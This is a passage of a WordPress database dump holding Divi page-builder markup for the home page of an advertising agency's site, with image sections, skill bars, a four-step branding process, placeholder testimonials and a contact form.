inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just three steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%32%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"|-5px|56px|21px||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\" custom_padding=\"|0px||||\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>[/et_pb_blurb][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"|||21px||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-08 21:28:22','2020-07-08 21:28:22','',134,'https://52.66.212.87/2020/07/08/134-revision-v1/',0,'revision','',0),(287,1,'2020-07-08 21:30:11','2020-07-08 21:30:11','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" 